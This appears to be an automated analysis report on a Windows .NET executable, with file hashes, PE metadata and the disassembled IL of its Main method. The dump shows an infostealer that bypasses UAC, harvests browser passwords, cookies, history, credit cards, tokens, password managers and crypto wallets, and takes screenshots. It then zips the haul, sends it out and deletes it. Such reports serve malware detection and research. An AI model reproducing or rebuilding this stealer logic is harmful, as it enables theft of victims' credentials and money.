4d049fe26c4367adfbe5b6c4d2d031cf
PE Executable | MD5: 4d049fe26c4367adfbe5b6c4d2d031cf | Size: 2.61 MB | application/x-dosexec
Symbol Obfuscation Score

| Hash | Hash Value |
|---|---|
| MD5 | 4d049fe26c4367adfbe5b6c4d2d031cf |
| Sha1 | 79af2c9bb81d9699a6948cc265d553bd5e1482bd |
| Sha256 | ed6963178802d34baee6184ac0bc08cd8bec179d35e7a1da21ef09a7623029f7 |
| Sha384 | bf2b64aa7cd2e4bf1f24e00dbef0b252c41b349b095181cee3a9d74839161526f62956044e4b0c85e0fbf4aee2df5390 |
| Sha512 | be70fc61c8e455d359b1a6dfd8dc5b76c3cb20b0372cf39df728e5566944c46d988ae45fb8251c900ea06594897985b8a8df9cf0403cc0e49bb1903e8a7f79df |
| SSDeep | 49152:eLvL+2upjBVhbAbXMtQl/wLz8r5S5l7KdVSZ4eY83TAcm:AL+2upjBVGVl/lQrCSZ4183Dm |
| TLSH | 33C523853BFC4948F6BF9F702DB626248579B8A25D21EB5E06C1309C1931FD5ADA0F23 |

PeID

| Name | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\Administrator\AppData\Local\Temp\2\StealerBuild_mbw1g6ks\obj\Release\WindowsService.pdb |
| Module Name | WindowsService.exe |
| Full Name | WindowsService.exe |
| EntryPoint | System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[]) |
| Scope Name | WindowsService.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | WindowsService |
| Assembly Version | 131.0.6778.140 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 1126 |
| Main Method | System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[]) |
| Main IL Instruction Count | 451 |
| Main IL | call System.AppDomain System.AppDomain::get_CurrentDomain() ldsfld System.UnhandledExceptionEventHandler chrome_v20_decryption_CSharp.Program/<>c::<>9__26_0 dup <null> brtrue.s IL_0024: callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) pop <null> ldsfld chrome_v20_decryption_CSharp.Program/<>c chrome_v20_decryption_CSharp.Program/<>c::<>9 ldftn System.Void chrome_v20_decryption_CSharp.Program/<>c::<Main>b__26_0(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.UnhandledExceptionEventHandler chrome_v20_decryption_CSharp.Program/<>c::<>9__26_0 callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) call System.Int32 chrome_v20_decryption_CSharp.Program::CheckSeenBefore() stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_seenBeforeCount call System.Boolean chrome_v20_decryption_CSharp.Program::FreeConsole() pop <null> leave.s IL_003E: nop pop <null> leave.s IL_003E: nop nop <null> ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) leave.s IL_004E: nop pop <null> leave.s IL_004E: nop nop <null> call System.Boolean chrome_v20_decryption_CSharp.Program::IsLicenseValid() brtrue.s IL_005B: leave.s IL_0063 leave IL_0475: ret leave.s IL_0063: nop pop <null> leave IL_0475: ret nop <null> call System.Void chrome_v20_decryption_CSharp.Program::SendPhoneHome() leave.s IL_006E: ldc.i4.0 pop <null> leave.s IL_006E: ldc.i4.0 ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldc.i4.0 <null> stloc.s V_4 ldarg.0 <null> ldlen <null> brtrue.s IL_008D: ldc.i4.0 ldc.i4.1 <null> stloc.0 <null> ldc.i4.1 <null> stloc.1 <null> ldc.i4.1 <null> stloc.2 <null> ldc.i4.1 <null> stloc.3 <null> ldc.i4.1 <null> stloc.s V_4 br IL_0223: 
ldloc.0 ldc.i4.0 <null> stloc.s V_11 br IL_0219: ldloc.s V_11 ldarg.0 <null> ldloc.s V_11 ldelem.ref <null> callvirt System.String System.String::ToLower() stloc.s V_12 ldloc.s V_12 brfalse IL_0213: ldloc.s V_11 ldloc.s V_12 call System.Int32 System.String::get_Length() stloc.s V_13 ldloc.s V_13 ldc.i4.2 <null> beq.s IL_00E0: ldloc.s V_12 ldloc.s V_13 ldc.i4.3 <null> beq IL_01E0: ldloc.s V_12 ldloc.s V_13 ldc.i4.s 9 sub <null> switch dnlib.DotNet.Emit.Instruction[] br IL_0213: ldloc.s V_11 ldloc.s V_12 ldc.i4.1 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 bgt.un.s IL_0104: ldloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_0167: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 100 beq IL_0190: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_14 ldc.i4.s 104 beq.s IL_017D: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_0151: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 beq IL_01B0: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_01A0: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_01C0: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 104 beq IL_01D0: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -p call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_0200: ldc.i4.1 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -c call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_0204: ldc.i4.1 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -h call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0208: ldc.i4.1 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -d call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_020C: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --passwords 
call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0200: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --downloads call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_020C: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --cookies call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0204: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --history call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0208: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -cc call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0210: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --creditcards call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0210: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.0 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.1 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.2 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.3 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.s V_4 ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_0095: ldarg.0 ldloc.0 <null> ldloc.1 <null> or <null> ldloc.s V_4 or <null> brfalse.s IL_0245: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program::IsAdmin() brtrue.s IL_0245: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program/UACBypass::BypassUAC() brfalse.s IL_023E: ldc.i4.0 leave IL_0475: ret ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.s V_4 newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() stloc.s V_5 ldnull <null> stloc.s V_6 ldnull <null> stloc.s V_7 ldnull <null> stloc.s V_8 ldnull 
<null> stloc.s V_9 ldnull <null> stloc.s V_10 ldloc.0 <null> brfalse.s IL_0267: leave.s IL_026C ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>> chrome_v20_decryption_CSharp.Chromium::GetLoginDataByBrowser() stloc.s V_6 leave.s IL_026C: nop pop <null> leave.s IL_026C: nop nop <null> ldloc.1 <null> brfalse.s IL_0279: leave.s IL_027E ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>> chrome_v20_decryption_CSharp.Chromium::GetCookiesByBrowser() stloc.s V_7 leave.s IL_027E: nop pop <null> leave.s IL_027E: nop nop <null> ldloc.2 <null> brfalse.s IL_028B: leave.s IL_0290 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>> chrome_v20_decryption_CSharp.Chromium::GetWebHistoryByBrowser() stloc.s V_8 leave.s IL_0290: nop pop <null> leave.s IL_0290: nop nop <null> ldloc.3 <null> brfalse.s IL_029D: leave.s IL_02A2 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>> chrome_v20_decryption_CSharp.Chromium::GetDownloadsByBrowser() stloc.s V_9 leave.s IL_02A2: nop pop <null> leave.s IL_02A2: nop nop <null> ldloc.s V_4 brfalse.s IL_02B0: leave.s IL_02B5 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>> chrome_v20_decryption_CSharp.Chromium::GetCreditCardsByBrowser() stloc.s V_10 leave.s IL_02B5: nop pop <null> leave.s IL_02B5: nop nop <null> ldloc.0 <null> brfalse.s IL_02C0: leave.s IL_02C5 ldloc.s V_6 call System.Void 
chrome_v20_decryption_CSharp.Program::WriteLogins(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>>) leave.s IL_02C5: nop pop <null> leave.s IL_02C5: nop nop <null> ldloc.1 <null> brfalse.s IL_02D0: leave.s IL_02D5 ldloc.s V_7 call System.Void chrome_v20_decryption_CSharp.Program::WriteCookies(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>>) leave.s IL_02D5: nop pop <null> leave.s IL_02D5: nop nop <null> ldloc.2 <null> brfalse.s IL_02E0: leave.s IL_02E5 ldloc.s V_8 call System.Void chrome_v20_decryption_CSharp.Program::WriteHistory(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>>) leave.s IL_02E5: nop pop <null> leave.s IL_02E5: nop nop <null> ldloc.3 <null> brfalse.s IL_02F0: leave.s IL_02F5 ldloc.s V_9 call System.Void chrome_v20_decryption_CSharp.Program::WriteDownloads(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>>) leave.s IL_02F5: nop pop <null> leave.s IL_02F5: nop nop <null> ldloc.s V_4 brfalse.s IL_0301: leave.s IL_0306 ldloc.s V_10 call System.Void chrome_v20_decryption_CSharp.Program::WriteCreditCards(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>>) leave.s IL_0306: nop pop <null> leave.s IL_0306: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::GatherSystemInfo() leave.s IL_0311: nop pop <null> leave.s IL_0311: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractTokens() leave.s IL_031C: nop pop <null> leave.s IL_031C: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractPasswordManagers() leave.s IL_0327: nop pop <null> leave.s IL_0327: nop nop 
<null> call System.Void chrome_v20_decryption_CSharp.Program::ScanFileSystem() leave.s IL_0332: nop pop <null> leave.s IL_0332: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::CaptureScreenshot() leave.s IL_033D: nop pop <null> leave.s IL_033D: nop nop <null> call System.Void chrome_v20_decryption_CSharp.CryptoWallets::GrabCryptoWallets() call System.String chrome_v20_decryption_CSharp.Program::GetWalletsDirectory() stloc.s V_15 ldloc.s V_15 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0369: leave.s IL_036E ldloc.s V_15 ldstr * ldc.i4.1 <null> call System.String[] System.IO.Directory::GetFiles(System.String,System.String,System.IO.SearchOption) ldlen <null> brfalse.s IL_0369: leave.s IL_036E ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasWallets leave.s IL_036E: nop pop <null> leave.s IL_036E: nop nop <null> call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin> chrome_v20_decryption_CSharp.Firefox::GetLogins() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin>::get_Count() stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ble.s IL_0393: call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldloc.s V_16 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie>::get_Count() stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ble.s IL_03B7: call System.String 
chrome_v20_decryption_CSharp.Program::GetOutputDirectory() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldloc.s V_17 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::WriteFirefoxData(System.String) call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::CopyFirefoxProfiles(System.String) leave.s IL_03D0: nop pop <null> leave.s IL_03D0: nop nop <null> call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() stloc.s V_18 ldloc.s V_18 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0440: leave.s IL_044A ldc.i4 500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.s V_18 call System.String chrome_v20_decryption_CSharp.Program::ZipFolder(System.String) stloc.s V_19 ldloc.s V_19 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0432: nop ldloc.s V_19 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0432: nop ldloc.s V_19 newobj System.Void System.IO.FileInfo::.ctor(System.String) ldc.i4 50331648 conv.i8 <null> stloc.s V_20 callvirt System.Int64 System.IO.FileInfo::get_Length() ldloc.s V_20 pop <null> pop <null> ldloc.s V_19 call System.Void chrome_v20_decryption_CSharp.Program::SendData(System.String) nop <null> ldloc.s V_19 call System.Void System.IO.File::Delete(System.String) leave.s IL_0432: nop pop <null> leave.s IL_0432: nop nop <null> ldloc.s V_18 ldc.i4.1 <null> call System.Void System.IO.Directory::Delete(System.String,System.Boolean) leave.s IL_0440: leave.s IL_044A pop <null> leave.s IL_0440: leave.s IL_044A leave.s IL_044A: nop callvirt System.Exception System.Exception::get_InnerException() pop 
<null> leave.s IL_044A: nop nop <null> ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) leave.s IL_045A: leave.s IL_0475 pop <null> leave.s IL_045A: leave.s IL_0475 leave.s IL_0475: ret pop <null> leave.s IL_0475: ret nop <null> call System.Void System.GC::Collect() call System.Void System.GC::WaitForPendingFinalizers() call System.Void System.GC::Collect() leave.s IL_0474: endfinally pop <null> leave.s IL_0474: endfinally endfinally <null> ret <null> |